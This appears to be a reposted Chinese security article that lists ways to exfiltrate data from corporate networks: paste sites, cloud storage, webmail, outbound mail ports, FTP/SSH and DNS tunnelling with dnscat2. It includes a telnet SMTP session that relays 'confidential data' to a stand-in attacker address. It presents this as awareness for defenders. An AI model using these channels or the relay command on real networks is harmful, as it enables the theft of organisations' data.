工欲善其事必先利其器,防范数据窃取必须先熟悉其使用的手段。文中所提及的大多数技术涉及直接的内部到外部数据窃取。需要说明的是这并不是一个完整版本,如果你知道的更多,那么请在评论处留言并告知我们!
Web
许多企业都没有在合适的地方设置任何类型的web代理这对于攻击者而言将会是个很好的机会。
Anon paste站点例如pastebin甚至是github,都为我们提供了一个数据窃取的简易通道。许多技术组织通常都会允许Github的使用。
如果有代理和过滤,你可能就需要花点心思了,但许多常见网站都会允许使用Dropbox,Google Drive和Box等,特别是那些有云外包服务的企业。
Email
你是否可以访问一些主要的网络邮件提供商 - 例如Gmail,Outlook.com等?如果你的目标企业有外包到Office 365或GSuite(检查其MX或邮件头),则更有可能实现此目的。
出站SMTP/POP3/IMAP是否可用。检查加密以及未加密的端口 - 25/465/587,110/999,143/993。
是否存在错误配置的邮件中继?是否可以通过欺骗内部地址来中继到外部地址?(这也可在内网钓鱼时用来绕过message hygiene过滤器 )
#telnet internal.smtp.local 25
HELO attacker
MAIL FROM:<attacker@domain.com>
RCPT TO:<attacker@attackerdomain.com>
DATA
Here is lots of confidential data
协议滥用
FTP/SSH/SCP/SFTP可能被允许出站,因为它们经常被用作数据交换协议。客户端工具也可以在系统上随时使用,而无需下载其他二进制文件。
DNS Tunneling,是隐蔽信道的一种,通过将其他协议封装在DNS协议中传输建立通信。因为在我们的网络世界中DNS是一个必不可少的服务,所以大部分防火墙和入侵检测设备很少会过滤DNS流量。这里推荐大家可以使用dnscat2。
大型站长资讯类网站! https://www.nzzz.com.cn